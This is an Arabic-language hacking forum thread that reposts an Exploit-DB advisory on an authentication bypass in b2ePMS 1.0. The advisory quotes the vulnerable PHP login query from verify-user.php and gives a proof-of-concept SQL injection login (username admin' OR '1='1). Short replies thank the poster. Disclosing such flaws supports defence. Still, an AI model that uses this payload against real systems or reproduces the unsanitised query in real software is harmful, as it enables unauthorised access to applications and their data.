اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }


النتائج 1 إلى 3 من 3

الموضوع: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

  1. #1
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    Gadid ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }



    [
    السلام عليكم و رحمة الله و بركاته


    #################################################
    b2ePMS 1.0 Authentication Bypass Vulnerability
    #################################################

    Discovered by: Jean Pascal Pereira <[email protected]>

    Vendor Information:

    "b2ePMS stands for Browser to Email Phone Message System. It is intended to replace the standard
    paper/carbon phone message slips commonly used in offices, with the capability of sending the message
    via a web browser form directly to the recipients inbox."

    Vendor URI: https://developer.berlios.de/projects/b2epms/

    #################################################

    Issue: SQL Injection, Authentication Bypass

    Risk level: High

    => The remote attacker has the possibility to execute arbitrary SQL Code.

    => The remote attacker is able to bypass the user authentication.

    In verify-user.php, line 20:

    -------------------------------------

    $sql = mysql_query("SELECT * FROM b2epms_user WHERE username='$username' AND user_passwd='$admin_passwd' AND activated='1' AND user_level='2'");
    $login_check = mysql_num_rows($sql);
    if($login_check > 0){
    while($row = mysql_fetch_array($sql)){
    foreach( $row AS $key => $val ){
    $$key = stripslashes( $val );
    }
    // Register session variables!
    session_register('userid');
    $_SESSION['userid'] = $user_level;
    mysql_query("UPDATE b2epms_user SET login_date=now() WHERE userid='$userid'"); $url = "Location: admin.php";
    header($url);
    }
    }

    -------------------------------------

    Exploit / Proof Of Concept:

    Perform a login with the following data:

    Username: admin' OR '1='1
    Password: x

    -------------------------------------

    #################################################


    رابط الثغره : http://www.exploit-db.com/exploits/18882




    تحياتي



  2. #2
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

    آسآل آلله عز وجل ان يجعل هذا العمل شاهدا لك لا عليك ...
    بآلتوفيق عزيزى ....!!


  3. #3
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    افتراضي رد: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

    تسلم يا غالي
    يسعدني مروركـ



المواضيع المتشابهه

  1. ثغره جديده { Galette (picture.php) SQL Injection Vulnerability }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-24-2012, 10:36 AM
  2. ثغره جديده { Sockso <=1.51 Persistent XSS }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 10:30 AM
  3. ثغره جديده اسمها vbulletin_md5
    بواسطة kapos في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 01-11-2012, 11:15 AM
  4. ثغره جديده بالتنسيق الشعري
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 11-27-2011, 04:01 PM
  5. Authentication Bypass in Home of MCLogin System
    بواسطة e . V . E . L في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-07-2011, 02:03 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات bypass

العاب مكلوجين فقط

Authentication Bypass ثغرةتعليم ثغره bypassثغرة admin bypassثغره paybassRegistration Bypass Vulnerability ثغرةpowered by Bypass Vulnerabilityby b2ePMS 1.0 Authentication Bypass Vulnerabilityتعلم Authentication Bypasspaybass ثغراتBypass AuthenticatioN In vBulletinثغرة bypassثغرات mysql_num_rows() Authentication Bypass Vulnerability ثغرةpowered by b2epmsثغرات bypass auth

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •